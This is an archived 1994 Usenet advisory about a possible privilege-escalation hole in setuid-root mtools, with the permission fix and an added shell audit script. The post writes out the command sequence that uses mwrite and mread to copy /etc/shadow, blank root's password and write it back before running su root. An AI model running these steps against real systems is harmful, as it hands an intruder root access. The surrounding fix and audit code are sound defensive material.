Setup dependent probable security hole

Post by Disaster prone simplet » Sat, 16 Apr 1994 02:56:26

Newsgroups: comp.os.linux.admin
Subject: Possible security hole (software version/setup dependent)
Distribution: world
Organization: Oxford University Undergraduate Engineering & Comp Sci Lab, UK

The following security hole may or may not be present on your system.
If you have your mtools setuid root, the following could well be possible
if you have a mess-dos disc in the floppy drive...
cracker% mwrite /etc/shadow A:
cracker% mread A:shadow hehe
cracker% <upload and edit hehe so root has no password>
cracker% <upload diddled /etc/shadow>
cracker% mwrite diddled A:
cracker% mread diddled /etc/shadow
cracker% su root

If this security hole is present on your system try:
chgrp fdisc /dev/fd*
chmod 660 /dev/fd*
chgrp fdisc /usr/bin/<mtools>
chmod a-s,g+s /usr/bin/<mtools>

(The presence or absence of this hole is obviously dependent on what version
of the mtools you use and how it is set up).

Duncan (-:
"I'll try it on my system sometime soon... it was just a cute idea I had"

P.S. If you have / as a DOS disc and the emulator setuid root, make sure that
crackers can't use the DOS emulator to give you an alternative version of
things you don't want them to (e.g. /etc/shadow).
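An audit helper in the spirit of the fix above, added here as an example and not part of Duncan's post: it reports which mtools binaries under a directory still carry the setuid bit (as opposed to the setgid-only state the chmod line leaves them in) and which floppy device nodes remain readable or writable by everyone. The list of binary names and the directory/device arguments are assumptions so the check can be run against a test tree rather than a live /usr/bin and /dev.

```shell
# Added example (not from the original post). POSIX sh.
# Classify one mtools binary by its special-permission bits.
# Returns 1 (and prints "setuid: ...") when the bit the post warns about is set.
check_mtools_binary() {
    f=$1
    if [ -u "$f" ]; then
        echo "setuid: $f"
        return 1
    elif [ -g "$f" ]; then
        # This is the state produced by "chmod a-s,g+s": group access only.
        echo "setgid-only: $f"
    else
        echo "no special bits: $f"
    fi
    return 0
}

# Scan a directory (assumed argument, e.g. /usr/bin) for the mtools
# front-ends named in the post plus a few common siblings. Returns non-zero
# if any of them is setuid.
find_setuid_mtools() {
    bin_dir=$1
    found=0
    for name in mread mwrite mcopy mdir mtools; do
        f="$bin_dir/$name"
        [ -f "$f" ] || continue
        check_mtools_binary "$f" || found=1
    done
    return $found
}

# Report floppy device nodes (assumed arguments, e.g. /dev/fd*) that are
# still readable or writable by "other"; "chmod 660" removes both bits.
# "-prune" keeps find on the node itself without descending.
find_open_floppy_devs() {
    found=0
    for d in "$@"; do
        [ -e "$d" ] || continue
        if [ -n "$(find "$d" -prune \( -perm -004 -o -perm -002 \) -print)" ]; then
            echo "world-accessible: $d"
            found=1
        fi
    done
    return $found
}
```

Run as `find_setuid_mtools /usr/bin; find_open_floppy_devs /dev/fd*`; a non-zero exit from either means the corresponding chgrp/chmod lines from the post still need applying.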